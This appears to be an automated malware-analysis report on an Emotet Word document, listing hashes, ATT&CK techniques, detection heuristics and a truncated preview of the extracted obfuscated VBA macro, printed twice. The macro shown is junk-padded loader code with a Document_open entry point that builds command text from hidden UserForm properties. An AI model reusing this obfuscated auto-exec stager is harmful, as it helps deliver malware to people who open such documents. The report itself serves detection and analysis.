Emotet Office (OLE) malware analysis — malicious · 6f2ee6ab0615008c

MALICIOUS

Office (OLE)

196.4 KB Created: 2019-12-18 14:57:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: abe5ee5489ee01246fc2dc10633b47f5 SHA-1: 567b1229a7fb03ddec7f789ee358921ab2260a1e SHA-256: 6f2ee6ab0615008c2f192248ddd134e9128b5c40bcd96650dfd4ae5b971b3dc8

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro that automatically executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_AUTOEXEC_EXEC' heuristic. The 'OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER' heuristic strongly suggests the use of a hidden UserForm to execute commands, a known technique for Emotet. ClamAV detection further confirms the malicious nature and identifies it as Emotet.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7465580-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7465580-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10718 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10718 bytes
SHA-256: `f053c2d825e87c0fa6eca97ea9fe652baf2c38270352bad0cf893d51dfe348aa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Cspsufnz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Aunztkpm, 0, 0, MSForms, TextBox" Private Sub Document_open() Select Case Semhlyhungfb Case Qazimmpmm Uzkansjrikt = Sin(Xelsceughdwpp) Befruuryw = CStr(Nwkoxxhd) Awkixhnvo = 324 Tdpefbxcffpyb = Sin(Vsgzhmoybhujx) Dhicusuk = CStr(Jbfblxirzlvpp) Ffowksaobc = 567 Ywfbhndxliw = Sin(Mrxbinsero) Nhdjmdyeh = CStr(Tjnblfawizny) Mtoolhhr = 5645 End Select For Gaoyfxkccxes = Gyqsfgajcg To Jpvcmbouvl While Rkolwdyu <> Inqpmotw Zunvgzkcd = Uhpausonzie * Atn(Hilxpzbyo) * (Xwsewsvr + Nfbprwejxz) Wend Next Select Case Ehcvbvyvfllez Case Vptrgxlbqjn Bigyhjktz = Sin(Tisciseckm) Tfpztfmmomq = CStr(Emwqiuvhgxxei) Flyvevntrkrnn = 324 Gsygefhmcsbfm = Sin(Vkmngdoupbrs) Qghliqffc = CStr(Xywcdpalzpgb) Vsyjfmmcglm = 567 Ernpixujesrl = Sin(Hgrjehwnxhw) Fuskqkvw = CStr(Zyeffragxt) Wpbimxrtf = 5645 End Select For Vpplhbbpun = Lzbrvxaydgay To Hyyfaggnjq While Sewdbrcxq <> Fvwfvhporh Crpnnlyqlbqe = Zeivgszn * Atn(Dbkfubyxuk) * (Meomrsyefs + Hkgvbgupzfjm) Wend Next Select Case Oojbeagwicek Case Qlairjtk Dzziuydp = Sin(Kinuycdmwgxza) Ruwnhyeo = CStr(Eaybjypocriyg) Fhntfezpgdd = 324 Ozgthvub = Sin(Mhhkystsnm) Qqvatflr = CStr(Rnadlorkp) Xblxtawn = 567 Udnipyhcpqn = Sin(Qukvhebdx) Spjczeoe = CStr(Wjnuvpkiawn) Vdjfoijmwsmp = 5645 End Select For Eckbjyrtkwb = Quwonhvnypz To Ecarbevafgqv While Cbsnedttsad <> Fbgmkbnto Vwqokogtjusl = Vwclkznc * Atn(Yztftptoizr) * (Eietkonmqz + Elidtftaaql) Wend Next Ypcskfcvzt End Sub Attribute VB_Name = "Yawrhmbhsbwi" Attribute VB_Base = "0{7F8AEFF3-2154-43B0-967E-7377B9A77D23}{888694DE-11C7-47AE-B819-FD4F5BF00557}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Uoagpajvxmfo" Function Ftcaxdmib() Select Case Mbrsopgly Case Ewpyfntwfacyj Clebwramhmwtt = Sin(Uxhtnzfx) Vxjekchfqmvgw = CStr(Ejhliuznd) Rqzxwocfb = 324 Hxjpncwgnax = Sin(Pxltcvjgyf) Ftpgerhmnbk = CStr(Gxrxretdqhzc) Glkjrxxi = 567 Zjipzvonj = Sin(Xrihbsnolqevo) Dssevxnl = CStr(Vddvtlsjg) Bbpfktypvouo = 5645 End Select For Vufeykflzgpj = Fllhshbqdzke To Ctbofcyrmeiyo While Jpbzgkjc <> Rrergtuujjgfa Toygzttkotj = Jlsqosnl * Atn(Glneegwepxjnw) * (Ndygqyxjqkyqp + Qezosvloo) Wend Next Wgcuxwrgcn = Cspsufnz.Aunztkpm Select Case Ihntanmjqteh Case Bqswvrvdplpm Byzkpmhm = Sin(Eprhokxxu) Hvjkazerbd = CStr(Misuurpjo) Rfzoofosrq = 324 Dpapncvjcqif = Sin(Qdfefucjrfakp) Lwruooetcc = CStr(Vibxupsplmmk) Tyvocmjwrtq = 567 Hmjccyagbq = Sin(Uxwaykhxx) Ynzukzrig = CStr(Kcckklwks) Iipmvsijomm = 5645 End Select For Oceqhjhbxo = Yoavancykfre To Yzxutyxr While Ggciamltc <> Einnykhbjkzte Ecvowhtsp = Txxtycegtr * Atn(Unpplxgmx) * (Ijxnwplqysnq + Plxpyrqu) Wend Next Yinsimowtqe = Wgcuxwrgcn + Yawrhmbhsbwi.Cmhrumweun + Yawrhmbhsbwi.Oevfeynstu + Yawrhmbhsbwi.Fybkwkiqtokz Select Case Fvdidzzqa Case Rvneidjntrl Jcdljgip = Sin(Jockacfwj) Yvoxnbreznue = CStr(Awnguqzbqdpgs) Nubpflhonv = 324 Kprpjylafsp = Sin(Vwelihiitm) Pynsizkpzomz = CStr(Hgjfufmfj) Dfovirdy = 567 Ayhxsezlgkfw = Sin(Czorngkoyqftw) Xibrlhibica = CStr(Cexgdpticlkq) Zrsyigujbe = 5645 End Select For Stxgpntpmts = Gzivwqbbvjk To Sgatdtbm While Lwwxwuzf <> Ibgloendpwjn Vnpsqzxdjz = Atfgwdmxuqaof * Atn(Ywaqygkcj) * (Pyverhope + Jzgasrenbnruz) Wend Next Pssdlvjcauhfr = Yinsimowtqe + Yawrhmbhsbwi.G ... (truncated)

SHA-256: f053c2d825e87c0fa6eca97ea9fe652baf2c38270352bad0cf893d51dfe348aa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Cspsufnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aunztkpm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Semhlyhungfb
         Case Qazimmpmm
   Uzkansjrikt = Sin(Xelsceughdwpp)
   Befruuryw = CStr(Nwkoxxhd)
   Awkixhnvo = 324
   Tdpefbxcffpyb = Sin(Vsgzhmoybhujx)
   Dhicusuk = CStr(Jbfblxirzlvpp)
   Ffowksaobc = 567
   Ywfbhndxliw = Sin(Mrxbinsero)
   Nhdjmdyeh = CStr(Tjnblfawizny)
   Mtoolhhr = 5645
End Select
For Gaoyfxkccxes = Gyqsfgajcg To Jpvcmbouvl
      While Rkolwdyu <> Inqpmotw
         Zunvgzkcd = Uhpausonzie * Atn(Hilxpzbyo) * (Xwsewsvr + Nfbprwejxz)
      Wend
Next
   Select Case Ehcvbvyvfllez
         Case Vptrgxlbqjn
   Bigyhjktz = Sin(Tisciseckm)
   Tfpztfmmomq = CStr(Emwqiuvhgxxei)
   Flyvevntrkrnn = 324
   Gsygefhmcsbfm = Sin(Vkmngdoupbrs)
   Qghliqffc = CStr(Xywcdpalzpgb)
   Vsyjfmmcglm = 567
   Ernpixujesrl = Sin(Hgrjehwnxhw)
   Fuskqkvw = CStr(Zyeffragxt)
   Wpbimxrtf = 5645
End Select
For Vpplhbbpun = Lzbrvxaydgay To Hyyfaggnjq
      While Sewdbrcxq <> Fvwfvhporh
         Crpnnlyqlbqe = Zeivgszn * Atn(Dbkfubyxuk) * (Meomrsyefs + Hkgvbgupzfjm)
      Wend
Next
   Select Case Oojbeagwicek
         Case Qlairjtk
   Dzziuydp = Sin(Kinuycdmwgxza)
   Ruwnhyeo = CStr(Eaybjypocriyg)
   Fhntfezpgdd = 324
   Ozgthvub = Sin(Mhhkystsnm)
   Qqvatflr = CStr(Rnadlorkp)
   Xblxtawn = 567
   Udnipyhcpqn = Sin(Qukvhebdx)
   Spjczeoe = CStr(Wjnuvpkiawn)
   Vdjfoijmwsmp = 5645
End Select
For Eckbjyrtkwb = Quwonhvnypz To Ecarbevafgqv
      While Cbsnedttsad <> Fbgmkbnto
         Vwqokogtjusl = Vwclkznc * Atn(Yztftptoizr) * (Eietkonmqz + Elidtftaaql)
      Wend
Next
Ypcskfcvzt
End Sub

Attribute VB_Name = "Yawrhmbhsbwi"
Attribute VB_Base = "0{7F8AEFF3-2154-43B0-967E-7377B9A77D23}{888694DE-11C7-47AE-B819-FD4F5BF00557}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Uoagpajvxmfo"
Function Ftcaxdmib()
   Select Case Mbrsopgly
         Case Ewpyfntwfacyj
   Clebwramhmwtt = Sin(Uxhtnzfx)
   Vxjekchfqmvgw = CStr(Ejhliuznd)
   Rqzxwocfb = 324
   Hxjpncwgnax = Sin(Pxltcvjgyf)
   Ftpgerhmnbk = CStr(Gxrxretdqhzc)
   Glkjrxxi = 567
   Zjipzvonj = Sin(Xrihbsnolqevo)
   Dssevxnl = CStr(Vddvtlsjg)
   Bbpfktypvouo = 5645
End Select
For Vufeykflzgpj = Fllhshbqdzke To Ctbofcyrmeiyo
      While Jpbzgkjc <> Rrergtuujjgfa
         Toygzttkotj = Jlsqosnl * Atn(Glneegwepxjnw) * (Ndygqyxjqkyqp + Qezosvloo)
      Wend
Next
Wgcuxwrgcn = Cspsufnz.Aunztkpm
   Select Case Ihntanmjqteh
         Case Bqswvrvdplpm
   Byzkpmhm = Sin(Eprhokxxu)
   Hvjkazerbd = CStr(Misuurpjo)
   Rfzoofosrq = 324
   Dpapncvjcqif = Sin(Qdfefucjrfakp)
   Lwruooetcc = CStr(Vibxupsplmmk)
   Tyvocmjwrtq = 567
   Hmjccyagbq = Sin(Uxwaykhxx)
   Ynzukzrig = CStr(Kcckklwks)
   Iipmvsijomm = 5645
End Select
For Oceqhjhbxo = Yoavancykfre To Yzxutyxr
      While Ggciamltc <> Einnykhbjkzte
         Ecvowhtsp = Txxtycegtr * Atn(Unpplxgmx) * (Ijxnwplqysnq + Plxpyrqu)
      Wend
Next
Yinsimowtqe = Wgcuxwrgcn + Yawrhmbhsbwi.Cmhrumweun + Yawrhmbhsbwi.Oevfeynstu + Yawrhmbhsbwi.Fybkwkiqtokz
   Select Case Fvdidzzqa
         Case Rvneidjntrl
   Jcdljgip = Sin(Jockacfwj)
   Yvoxnbreznue = CStr(Awnguqzbqdpgs)
   Nubpflhonv = 324
   Kprpjylafsp = Sin(Vwelihiitm)
   Pynsizkpzomz = CStr(Hgjfufmfj)
   Dfovirdy = 567
   Ayhxsezlgkfw = Sin(Czorngkoyqftw)
   Xibrlhibica = CStr(Cexgdpticlkq)
   Zrsyigujbe = 5645
End Select
For Stxgpntpmts = Gzivwqbbvjk To Sgatdtbm
      While Lwwxwuzf <> Ibgloendpwjn
         Vnpsqzxdjz = Atfgwdmxuqaof * Atn(Ywaqygkcj) * (Pyverhope + Jzgasrenbnruz)
      Wend
Next
Pssdlvjcauhfr = Yinsimowtqe + Yawrhmbhsbwi.G
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.